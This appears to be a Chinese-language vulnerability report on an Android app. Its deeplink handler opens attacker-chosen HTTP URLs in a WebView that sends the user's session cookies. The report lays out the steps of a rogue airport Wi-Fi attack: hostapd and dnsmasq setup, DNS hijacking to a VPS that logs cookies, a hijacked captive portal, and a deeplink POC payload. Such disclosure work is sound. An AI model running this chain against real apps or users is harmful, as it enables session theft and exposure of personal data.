用户接入恶意WIFI即打开某APP,泄露用户cookie,攻击者可以通过token获取用户手机号、收藏、收货地址等
漏洞详情
查看manifest.xml有如下deeplink activity
"com.xxxx.client.android.modules.deeplink.ParseDeepLinkActivity" android:noHistory="true" android:theme="@style/Transparent" android:windowSoftInputMode="0x10">
<intent-filter>
<action android:name="com.xxxx.client.android.activity.HomeActivity"/>
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="scheme"/>
</intent-filter>
</activity>
逆向ParseDeepLinkActivity代码
@Override // android.app.Activity
public void onCreate(Bundle arg13) {
String v0;
e v13;
Intent v1_2;
String frompage;
String v3 = "";
super.onCreate(arg13);
if(s.i()) {
try {
this.uri = this.getIntent().getData();
if(this.uri == null) {
this.finish();
return;
}
e.e.b.a.n.a.d.b();
jb.b("CT_TAG", "uri = " + this.uri);
v3 = this.uri.getQuery();
if(TextUtils.isEmpty(v3)) {
goto label_61;
}
else {
this.schemabean = g.SCHEME_GETURLJSON(v3);
v3 = this.schemabean;
if(((SchemeBean)v3) == null) {
goto label_61;
}
boolean v3_1 = TextUtils.isEmpty(this.schemabean.getFrompage());
goto label_37;
}
goto label_62;
}
catch(Exception v1) {
goto label_174;
}
..
会从查询参数中获取并反列序json,得到结构SchemeBean,之后会根据bean的内容进行派发
if(bean1 != null) {
if(g.a(v1, bean1, v6)) {
return;
}
String v7_1 = bean.getChannelName();
int v8 = -1;
switch(v7_1.hashCode()) {
case -2034194897: {
boolean v7_2 = v7_1.equals("fenlei_detail");
if(v7_2) {
v8 = 18;
}
break;
}
case 3322092: {
if(v7_1.equals("live")) {
v8 = 0;
}
break;
}
case 1288290882: {
if(v7_1.equals("wiki_all_product")) {
v8 = 40;
}
break;
}
case 1843825908: {
if(v7_1.equals("taskreward")) {
v8 = 23;
}
break;
}
case 1991869741: {
if(v7_1.equals("pinpai_detail")) {
v8 = 17;
}
break;
}
...
case 3277: {
if(v7_1.equals("h5")) {
v8 = 60;
}
break;
}
渠道非常多,h5表示要打开h5页面,如下代码会通过路由寻找跳转到对应的activity
case 60: {
if(("1".equals(bean.getLogin())) && !e.e.b.a.b.c.Ya()) {
Ea.a(v1, 0x392FC);
return;
}
b v3_19 = e.a().a("path_activity_zdm_web_browser", "group_route_browser");
v3_19.putstring("url", bean.getLinkVal());
v3_19.putstring("sub_type", "h5");
v3_19.putstring("from", e.e.b.a.u.h.a(v6));
v3_19.t();
goto label_1102;
}
逆向路由注册代码,loadInto为路由统一注册接口,找到对应的activity为HybridActivity
public class o implements b {
@Override // com.xxxx.android.router.api.e.b
public void loadInto(Map arg8) {
arg8.put("path_activity_zdm_web_browser", a.a(e.e.a.c.a.a.a.ACTIVITY, HybridActivity.class, "path_activity_zdm_web_browser", "group_route_browser", null, -1, 0x80000000));
}
}
分析HybridActivity的onCreate方法,里面初始化webview并且loadUrl
@Override // com.xxxx.client.android.base.BaseActivity
protected void onCreate(Bundle arg5) {
super.onCreate(arg5);
this.A = new HybridPresenter(this, this.za(), this.getIntent().getStringExtra("link_type"), this.getIntent().getStringExtra("sub_type"));
if(com.xxxx.client.android.hybrid.b.a.a.TRANSPARENT == this.P().h()) {
int v5 = Build.VERSION.SDK_INT;
if(v5 >= 21) {
int v0 = 0x500;
if(v5 >= 23 && this.P().l() == 1) {
v0 = 0x2500;
}
this.getWindow().getDecorView().setSystemUiVisibility(v0);
this.getWindow().setStatusBarColor(ContextCompat.getColor(this.getContext(), 0x106000D));
}
}
this.getLifecycle().a(this.A);
if(2 == this.A.b(this.getIntent())) {
return;
}
this.La();
this.y = this.init_webview();
this.A.a(this.getIntent());//这里会同步cookie
}
遍历webview加载的jsBridge,发现并没有什么可利用的js接口,暂且不表。回到上文的同步cookie的代码
public static void syncCookie(String arg1) {
ia.syncCookie(arg1, false);
}
public static void syncCookie(String url, boolean arg9) { //arg9固定为false
if(!TextUtils.isEmpty(url) && ((arg9) || (url.contains(".xxxx.com")))) {
try {
jb.b("Nat: webView.syncCookie.url", url);
CookieManager v9 = CookieManager.getInstance();
String oldcookie = v9.getCookie(url);
if(oldcookie != null) {
jb.b("Nat: webView.syncCookie.oldCookie", oldcookie);
}
v9.setAcceptCookie(true);
HashMap v2_1 = Na.a(true);
if(v2_1 != null) {
if(TextUtils.isEmpty(((CharSequence)v2_1.get("sess")))) {
v9.setCookie(".xxxx.com", "sess=;");
}
if(TextUtils.isEmpty(((CharSequence)v2_1.get("ab_test")))) {
v9.setCookie(".xxxx.com", "ab_test=;");
}
if(ia.isContain_smzdm_com(url)) {
Iterator v2_2 = v2_1.entrySet().iterator();
while(true) {
boolean v3 = v2_2.hasNext();
if(!v3) {
break;
}
Object v3_1 = v2_2.next();
Map.Entry v3_2 = (Map.Entry)v3_1;
v9.setCookie(".yying.com", ((String)v3_2.getKey()) + "=" + Na.a(((String)v3_2.getValue())) + ";");
v9.setCookie(".xxxx.com", ((String)v3_2.getKey()) + "=" + Na.a(((String)v3_2.getValue())) + ";");
}
v9.setCookie(".xxxx.com", "f=" + Na.a("android"));
v9.setCookie(".xxxx.com", "v=" + Na.a("9.9.10"));
v9.setCookie(".xxxx.com", "coupon_h5=" + com.xxxx.client.base.utils.b.c().a("coupon_h5") + ";");
v9.setCookie("go.xxxx.com", "scene=" + Na.a(Aa.b) + ";");
}
}
String v8_1 = v9.getCookie(url);
if(v8_1 != null) {
jb.b("Nat: webView.syncCookie.newCookie", v8_1);
return;
}
}
catch(Exception v8) {
jb.b("Nat: webView.syncCookie failed", v8.toString());
return;
}
}
}
以上代码的意义是为.xxxx.com和.yying.com设置cookie,如果URL的域名是其子域名,那么webview在访问该URL时会自动带上cookie。但是并没有校验URL是否为HTTPS,这里可以是HTTP,可以构造DNS劫持。
攻击过程
搭建恶意WIFI
虚拟机安装kali,再通过apt安装hostapd、dnsmasq和nginx,硬件使用USB无线网卡tplink WN722N。
1、启动热点
在hostapd.conf设置SSID为SZ Airport Free,无认证,这个名字拿到机场相信一定会有所收获
2、搭建本地DNS
在dnsmasq.conf中设置DHCP及DNS,将域名a.xxxx.com解析到我的外网VPS,该VPS上设置nginx的access_log记录cookie。
3、设置captive-portal-login
华为手机进行网络评估时,会访问connectivitycheck.platform.hicloud.com。因此配置DNS使connectivitycheck.platform.hicloud.com解析为192.168.1.1,并在192.168.1.1上设置nginx使其返回302:
并在192.168.1.1/index.html中插入代码使浏览器拉起APP
POC:
{"channelName":"h5","linkVal":"http://a.xxxx.com/jsloop.html"}
经过URL编码